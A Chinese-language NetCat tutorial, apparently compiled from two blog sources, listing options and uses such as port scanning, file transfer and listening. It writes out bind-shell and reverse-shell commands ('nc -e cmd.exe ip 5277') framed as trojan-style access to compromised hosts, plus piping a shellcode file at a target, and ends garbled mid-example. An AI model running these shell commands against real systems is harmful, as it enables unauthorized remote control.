NC(NetCat)命令详解

NetCat，在网络工具中有“瑞士军刀”美誉，其有Windows和Linux的版本。因为它短小精悍（25k）、功能实用，被设计为一个简单、可靠的网络工具，可通过TCP或UDP协议传输读写数据。同时，它还是一个网络应用Debug分析器，因为它可以根据需要创建各种不同类型的网络连接。

 

NetCat 官方地址：http://netcat.sourceforge.net/

以下是详细使用。

一、
在DOC窗口转换到nc所放置的盘符输入nc.exe -h即可看到各参数的使用方法。

-d 后台模式
-e prog 程序重定向，一旦连接，就执行 [危险!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h 帮助信息
-i secs 延时的间隔
-l 监听模式，用于入站连接
-L 连接关闭后,仍然继续监听
-n 指定数字的IP地址，不能用hostname
-o file 记录16进制的传输
-p port 本地端口号
-r 随机本地及远程端口
-s addr 本地源地址
-t 使用TELNET交互方式
-u UDP模式
-v 详细输出--用两个-v可得到更详细的内容
-w secs timeout的时间
-z 将输入输出关掉--用于扫描时

二、

1. -4 强制使用ipv4
2. -6 强制使用ipv6
3. -D 允许socket通信返回debug信息
4.       -d 不允许从标准输入中读取
5. -h 显示nc帮助文档
6. -i interval 
7.    指定每行之间内容延时发送和接受，也可以使多个端口之间的连接延时
8. -k 当一个连接结束时，强制nc监听另一个连接。必须和-l一起使用
9. -l 用于监听传入的数据链接，不能与-p -z -s一起使用。-w 参数的超时也会被忽略
10. -n 不执行任何地址，主机名，端口或DNS查询
11. -p 指定nc使用的源端口，受权限限制且不能余-l一起使用
12. -r 指定nc使用的源端口和目的端口，不能使用系统原来就指定的那些端口
13. -S 允许在RFC 2385的TCP MD5签名选项
14. -s source_ip_address 
15.    指定用于发包的接口的IP地址，不能和-l一起使用
16. -T ToS
17.    指定链接的IP服务类型（TOS）
18. -C 自动换行
19. -t 使nc能够与telnet交互
20. -U 使用UNIX域socket
21. -u 使用udp代替默认的tcp选项
22. -v 输出详细报告
23. -w timeout
24.     一个链接一段时间无操作，则自动断开，默认无超时
25. -X proxy_version
26.     指定nc使用代理时所采用的协议,可选的有socksv4，socks5以及https。默认socks5
27. -x proxy_address[:port]
28.     指定nc使用的代理地址和端口。默认设置:1080(SOCKS),3128(HTTPS)
29. -z 只监听不发送任何包

三、

1)连接到远程主机
格式：nc -nvv 192.168.x.x 80
讲解：连到192.168.x.x的TCP80端口

2)监听本地主机
格式：nc -l -p 80
讲解：监听本机的TCP80端口

3)扫描远程主机
格式：nc -nvv -w2 -z 192.168.x.x 80-445
讲解：扫描192.168.x.x的TCP80到TCP445的所有端口

4)remote主机绑定SHELL，例子：
格式：nc -l -p 5354 -t -e c:\winnt\system32\cmd.exe
讲解：绑定remote主机的cmdremote在remote主机的TCP5354端口

5)remote主机绑定shell并反向连接，例子：
格式：nc -t -e c:\winnt\system32\cmd.exe 192.168.x.x 5354
讲解：绑定remote主机的cmdshell并反向连接到192.168.x.x的TCP5354端口
以上为最基本的几种用法（其实NC的用法还有很多，
当配合管道命令"|"与重定向命令"<"、">"等等命令功能更强大......）。

6)作攻击程序用，例子：
格式1：type.exe c:\exploit.txt|nc -nvv 192.168.x.x 80
格式2：nc -nvv 192.168.x.x 80 < c:\exploit.txt
讲解：连接到192.168.x.x的80端口，并在其管道中发送'c:\exploit.txt'的内容(两种格式确有相同的效果，真是有异曲同工之妙:P)
附：'c:\exploit.txt'为shellcode等

7)作蜜罐用[1]，例子：
格式：nc -L -p 80
讲解：使用'-L'(注意L是大写)可以不停地监听某一个端口，直到ctrl+c为止

8)作蜜罐用[2]，例子：
格式：nc -L -p 80 > c:\log.txt
讲解：使用'-L'可以不停地监听某一个端口，直到ctrl+c为止，同时把结果输出到'c:\log.txt'中，如果把‘>'
　 改为‘>>'即可以追加日志
附：'c:\log.txt'为日志等

9)作蜜罐用[3]，例子：
格式1：nc -L -p 80 < c:\honeypot.txt
格式2：type.exe c:\honeypot.txt|nc -L -p 80
讲解：使用'-L'可以不停地监听某一个端口，直到ctrl+c为止，并把'c:\honeypot.txt'的内容‘送'入其管道中！
10)备份档案
A机的资料夹 /data备份到B主机的backup.tgz
源主机: tar czf - work|nc -l -c -p 1234
目的主机: nc 192.168.0.1 1234 >a.tgz
或
A:tar -zcf data|nc -l -p 4444
B:nc a 4444 >backup.tgz 参数解释：
 -l：监听端口，监听入站信息
 -p：后跟本地端口号
 -v：显示端口的信息，如果使用-vv的话，则会显示端口更详细的信息
 提示：一般大家都爱用-vv
 nc -l -p 80
 这个很简单，监听80端口
 如果机器上运行这个命令，端口80被认为是开放的，可以欺骗很多扫描器的哦！
 nc -l -p 80 > e:log.dat
 呵呵，功能和上边一样，但是后边加了个“> e:log.dat”我想，学过ECHO
 那个命令的人都会知道吧，是在E盘创建一个log.dat的日志文件
 nc -l -v -p 80
 和上边命令相似，不过这次不是记录在文件里，而是会直接显示在运行着NC
 的屏幕上。
 呵呵，讲了这么多，来实践下
 nc -l -v -p 80
 然后在浏览器中输入本机IP：127.0.0.1
 呵呵，看到什么？
 同样，上边两个也是一样，大家自己试验一下吧
 命令2：程序定向
 nc -l -p port -t -e cmd.exe
 本地机： nc -l -p port 或 nc -l -v -p port
 目标机：nc -e cmd.exe ip port

 参数解释：
 -l、-p两个参数已经解释过了
 -e；作用就是程序定向
 -t：以telnet的形式来应答
 例子
 nc -l -p 5277 -t -e cmd.exe
 知道运行在哪里吗？千万不要运行在自己的机器上，如果运行了，你机器
 就会变成一台TELNET的服务器了，呵呵，解释一下：监听本地端口5277的
 入站信息，同时将CMD.exe这个程序，重定向到端口5277上，当有人连接的时候，就让程序CMD.exe以TELNET的形式来响应连接要求。
 local machine：nc -l -p port ( or nc -l -v -p port )
 remote machine：nc -e cmd.exe ip port
 大家知道灰鸽子和神偷吧，这两款工具都是利用了反弹端口型的木马，
 什么叫反弹端口？就是说，当对方中马后，不用你主动和对方连接，也就是说
 不用从你的client端向对方主机上运行的server端发送请求连接，而是对方主动来连接你
 这样就可以使很多防火墙失效
 nc -l -p 5277 （坚听本地5277端口）
 同样也可以用
 nc -l -v -p 5277
 运行在本地
 然后在远程机器上，想办法运行
 nc -e cmd.exe ip 5277
 （你可别真的打“ip”在肉机上啊）要打，xxx.xxx.xxx.xxx这样！！
 呵呵，看看在本地机器上出现了什么？
 这样就是反弹~~在本地机器上得到了一个SHELL
 命令3：扫描端口
 nc -v ip port
 nc -v -z ip port-port
 nc -v -z -u ip port-port
 参数解释：
 -z：将输入输出关掉，在扫描时使用
 nc -v ip port
 这个命令是针对某一个端口进行扫描
 例如：
 nc -v ip 135
 扫描远程主机的135端口，这样获得了该端口的一些简单信息，但是针对某些端口，我们还可以获得更多的信息
 例如：80端口
 我们可以使用nc -v ip 80 然后使用get方法来获得对方的WEB服务器的信息
 nc -v -z ip port-port
 这个命令是用来扫描的一个命令，这个命令用于快速扫描TCP端口，而port-port则是指定了扫描的端口范围
 例如：
 nc -v -z ip 1-200
 可以看到我机器上的1-200的TCP端口的开放情况
 nc -v -z -u ip port-port
 这个命令比上个命令多了个-u，这个命令的作用仍然是扫描端口，只是多了一个-u的参数，是用来扫UDP端口的
 例如：
 nc -v -z -u ip 1-200
 这个命令就会扫1-200的UDP端口
 命令4：传送文件（HOHO，I LIKE）
 LOCAL MACHINE：nc -v -n ip port  y:svr.exe
 参数解释：
 -n：指定数字的IP地址
 这两个命令结合起来是用来传送文件的
 首先，在远程机上运行命令：
 nc -v -l -p 5277 > c:pulist.exe
 这个命令还记的吗？呵呵，是不是和监听命令有点类似，对，没错，这个是监听5277端口
 并把接受到的信息数据写到c:pulist.exe中
 这时候在本地机上运行

 

 

本文所参考的文献：http://blog.csdn.net/wang7dao/article/details/7684998

                                http://linux.chinaunix.net/techdoc/system/2008/10/14/1038114.shtml